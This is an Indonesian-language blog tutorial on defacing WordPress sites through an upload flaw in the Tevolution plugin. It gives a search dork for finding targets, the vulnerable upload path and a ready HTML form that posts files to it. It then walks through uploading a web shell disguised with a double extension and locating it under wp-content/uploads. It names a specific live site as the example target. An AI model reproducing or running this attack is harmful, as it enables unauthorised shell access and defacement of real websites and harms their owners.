» » Deface Metode Tevolution Plugin Vulnerability
Sunday 4 June 2017

Deface Metode Tevolution Plugin Vulnerability

Tutorial-Tutorial
Sunday 4 June 2017
Belum ada komentar





Deface Metode Tevolution Plugin Vulnerability

Bahan Bahan :

1. Dork: inurl:"/plugins/Tevolution/" (kembangi lagii)

2. Exploit: /wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php

3. CSRF (save dengan format .html ):
<form action = "http://site.target/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php" 
method = "post" enctype = "multipart / form-data"> <label for = "file"> Filename: </ label> <input type = "file" name = "Filedata"> reviews <input type = "submit" name = "submit" value = "3xploi7ed!"> </ form >

4. Shell: format .php.xxxjpg => Download
    contoh: Shell.php.xxxjpg 

5. Script deface : download

Step by Step :

1. Dorking Dulu

2. Pilih salah satu Web
    Live Target: http://www.hebergement.rayssaguel.com/

3. Masukkan Exploitnya 
    contoh : http://www.hebergement.rayssaguel.com/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php

Vuln ?! "Blank" (Putih semua)

4. Buat CSRF nya tadi => Masukkan Target => Save dengan format .html

5. Buka CSRF => Upload Shell / Script deface

Kalau Gagal ada Tulisan [Error]

Akses Shell?!
www.site.com/wp-content/uploads/[tahun]/[bulan]/nameshell

Akses Script Deface?!

www.site.com/wp-content/uploads/[tahun]/[bulan]/namascript.html

Subscribe to: Post Comments (Atom)